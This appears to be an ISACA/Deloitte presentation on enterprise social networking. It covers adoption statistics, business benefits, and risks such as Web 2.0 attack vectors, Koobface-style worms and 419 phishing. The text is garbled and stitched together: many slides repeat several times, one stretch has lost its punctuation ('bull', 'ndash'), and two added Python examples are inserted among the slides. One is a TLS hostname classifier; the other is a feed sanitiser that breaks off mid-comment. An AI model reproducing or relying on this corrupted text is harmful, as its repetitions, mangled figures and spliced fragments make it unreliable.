  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009) – http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009) – http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org 13
Social network — More terminology (cont.)
Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook
Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)
• As of March 13, 2010, Facebook was America's most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google's 7.0%
www.isaca.org 14
Social network — More terminology (cont.)
Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
www.isaca.org 15
Social network — More terminology (cont.)
Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, and .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
www.isaca.org 16
Social network — More terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
www.isaca.org 17
Social Networking Companies

Social Media                      Popular Examples
Wikis                             Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs                             livejournal, WordPress, Blogger, Technorati, xanga
Social Networking                 myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)   newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging        twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging    delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing    YouTube, flickr, shutterfly, last-fm, slideshare
www.isaca.org 18
Why and how companies are using social networking
www.isaca.org 19
Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies. US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 20
Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies. US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 21
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
www.isaca.org 22
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system for a company's intellectual assets to be easily captured, stored and accessed
• Reduce the net volume of e-mail and allow users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Create better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
www.isaca.org 23
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
www.isaca.org 24
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
www.isaca.org 25
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media: most companies that use Social Media don't approach it the way they would any other mission-critical technology.
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues.
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail.
"Fully half of all Social Media investments will fail." - Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1000 times." - Michael Scott, The Office
• Productivity: users employ social media tools for nonproductive purposes such as socializing ("social notworking").
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern.
  – "Sign in using your account with…" Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
  – Each of these federated sign-in options makes the external identity provider part of your authentication path: whoever controls that account, or a token it issues, controls the linked accounts on every site that accepts it.
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding: in many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification: researchers currently face challenges quantifying social networking benefits.
  – Valuation techniques include, among others, Beckstrom's law, which states that "the value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all."
  – Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
- Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
- Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection: content handed to a third-party service does not carry the protection it would have on your own premises.
• Encryption of data storage unlikely: the provider holds your content in the clear on its own systems.
• Lack of encryption while data is in use: content is processed in the clear by the provider's applications and by the partners and plug-ins the provider exposes it to.
• Data remanence: deleted content can persist in backups, caches and copies; providers make only a limited attempt to address this.
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how that information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications ride on ports 80 and 443, the same ports as the rest of the organization's web traffic, so a port-based rule cannot single them out without blocking the web
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
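To make the "identify applications regardless of port or SSL" point concrete, here is an added example (not vendor code and not from the presentation) of one signal such a firewall uses: the Server Name Indication hostname that the TLS ClientHello carries in clear text before encryption starts. The script constructs its own ClientHello so it runs offline; the signature table, the hostnames and the function names are this example's own illustrative assumptions.

```python
"""Added example: application identification inside TLS on any port.

A port-based rule only sees "something on tcp/8443". The TLS ClientHello,
however, still carries the destination hostname in clear text in its
Server Name Indication (SNI) extension, and that is one of the signals an
application-aware firewall uses. build_client_hello() constructs test
traffic so the script runs offline; extract_sni() parses the hostname out
of it; classify() maps the hostname to an application. The signature
table and hostnames are illustrative, not any vendor's signature set.
"""
import os
import struct

# Illustrative application signatures: hostname suffix -> application name.
APP_SIGNATURES = {
    "facebook.com": "Facebook",
    "fbcdn.net": "Facebook",
    "twitter.com": "Twitter",
    "linkedin.com": "LinkedIn",
    "myspace.com": "MySpace",
}


def build_client_hello(server_name):
    """Build a minimal TLS 1.2 ClientHello record with an SNI extension
    (constructed test traffic, not a packet capture)."""
    name = server_name.encode("idna")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name   # type 0 = host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (
        b"\x03\x03" + os.urandom(32)          # client_version, random
        + b"\x00"                             # empty session_id
        + struct.pack("!HH", 2, 0xC02F)       # one cipher suite
        + b"\x01\x00"                         # null compression only
        + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(data):
    """Return the host_name from a TLS ClientHello, or None when the bytes
    are not a ClientHello, carry no SNI, or are truncated. All offsets are
    bounds-checked so hostile input fails closed instead of raising."""
    try:
        if len(data) < 44 or data[0] != 0x16 or data[5] != 0x01:
            return None
        pos = 43                                   # record hdr(5) + hs hdr(4) + version(2) + random(32)
        pos += 1 + data[pos]                       # session_id
        pos += 2 + struct.unpack("!H", data[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + data[pos]                       # compression_methods
        if pos + 2 > len(data):
            return None                            # no extensions block at all
        ext_end = pos + 2 + struct.unpack("!H", data[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= ext_end:
            ext_type, ext_len = struct.unpack("!HH", data[pos:pos + 4])
            pos += 4
            if ext_type != 0x0000:                 # not server_name, skip it
                pos += ext_len
                continue
            # server_name: 2-byte list length, then entries of
            # 1-byte name_type (0 = host_name), 2-byte length, name bytes
            entry = pos + 2
            while entry + 3 <= pos + ext_len:
                name_type = data[entry]
                name_len = struct.unpack("!H", data[entry + 1:entry + 3])[0]
                if entry + 3 + name_len > pos + ext_len:
                    return None                    # length runs past the extension
                if name_type == 0:
                    return data[entry + 3:entry + 3 + name_len].decode("ascii")
                entry += 3 + name_len
            return None
        return None
    except (struct.error, IndexError, UnicodeDecodeError):
        return None


def classify(server_name):
    """Map a hostname to an application by domain-suffix match."""
    if not server_name:
        return "unknown"
    host = server_name.lower().rstrip(".")
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return "unknown"


def classify_flow(dst_port, payload):
    """Contrast what a port rule sees with what SNI inspection sees."""
    sni = extract_sni(payload)
    return {
        "port_based": "HTTPS" if dst_port == 443 else "unknown",
        "sni": sni,
        "application": classify(sni),
    }


if __name__ == "__main__":
    for port, host in [(443, "www.facebook.com"),
                       (8443, "api.twitter.com"),
                       (443, "intranet.example.com")]:
        print(port, classify_flow(port, build_client_hello(host)))
```

Two caveats a practitioner should keep in mind: SNI is client-supplied, so it can be omitted or spoofed, and Encrypted ClientHello hides it entirely; production firewalls corroborate it with the server certificate, traffic patterns and (where policy allows) decryption. The suffix match deliberately requires a dot boundary so that "notfacebook.com" is not classified as Facebook.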
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, more than four times the 2009 figure of 140 million (Source: eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social Networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." - Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go." - Biz Stone, co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs
Senior Manager
AERS (Audit & Enterprise Risk Services)
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj, et al. "Web 2.0 reinvents corporate networking." Deloitte Consulting LLP (2008)
  – The Economist, "A special report on social networking," January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet and Keep Google Out," Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says," Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site: http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org 14
Social network: more terminology (cont.)
Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
www.isaca.org 15
Social network: more terminology (cont.)
Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication; .rss, .xml or .rdf files are used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
www.isaca.org 16
Social network: more terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
www.isaca.org 17
Social Networking Companies
Social media type: popular examples
• Wikis: Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
• Blogs: LiveJournal, WordPress, Blogger, Technorati, Xanga
• Social networking: myspace.com, LinkedIn, Facebook, Friendster, Plaxo
• RSS (Really Simple Syndication): NewsGator, Bloglines, iGoogle, FeedBurner
• Presence and microblogging: Twitter, Pownce, Jaiku, Hictu, Tumblr
• Social bookmarking and tagging: Delicious, Digg, Reddit, Newsvine, StumbleUpon
• Online photo and video sharing: YouTube, Flickr, Shutterfly, Last.fm, SlideShare
www.isaca.org 18
Why and how companies are using social networking
www.isaca.org 19
Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 20
Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 21
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
www.isaca.org 22
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system in which a company's intellectual assets can be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
www.isaca.org 23
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about, describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and give valuable information about preventing, preparing for and responding to emergencies. http://redcrosschat.org
www.isaca.org 24
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 25
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. httpsmixblueshirtnationcom
www.isaca.org 27
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
www.isaca.org 28
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledge base, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the "Yahoo! Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• Louisville Metro Government, Kentucky
  – Interactive audit findings on its Web site allow users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – Shelfari, a social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest updates.
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                     Monthly active users
1     FarmVille                82,580,911
2     Static FBML              46,827,021
3     Birthday Cards           41,904,049
4     Café World               30,032,716
5     Facebook for iPhone      29,438,848
6     Texas HoldEm Poker       28,332,917
7     Slide FunSpace           25,630,033
8     Happy Aquarium (BETA)    24,915,971
9     Mafia Wars               24,704,179
10    Causes                   24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors, as a result of the shift in technology: Web services now empower server-side core technology components, while Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients enhance the client-end interface in the browser itself.
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf)
  – Cross-site scripting ("XSS") in AJAX, e.g. the Samy worm that exploited an XSS flaw in MySpace.com
  – XML poisoning: poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution: the browser replays the session cookie on every request, so injected script can make authenticated calls silently
  – RSS/Atom injection: JavaScript injected into feeds executes in the client browser that renders them
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines that is not repeated with server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume information and variables from the SOAP message
  – XPath injection in the SOAP message to bypass authentication mechanisms
  – RIA thick client binary manipulation: issues with session management
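The RSS/Atom injection item in the list above is worth seeing in code, because it is the same failure as the missing server-side checks two items later: an aggregator trusts feed fields it did not produce. The following is an added example (not from the presentation or the Net-Square paper) of a small aggregator in Python that parses a constructed feed whose second item carries a script payload and a javascript: link, renders it the naive way, and then renders it with every field HTML-escaped and only absolute http/https links allowed. The sample feed, the function names and the hostnames in it are this example's own constructions.

```python
"""Added example: sanitising a syndicated feed before it reaches a browser.

An attacker who controls (or can tamper with) a feed plants script in item
fields; an aggregator or mashup that drops those strings straight into its
page executes the script in every reader's browser. The fix is to treat
each feed field as untrusted text: HTML-escape it and allow only absolute
http/https links.
"""
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample feed (not a real feed). The second item carries a
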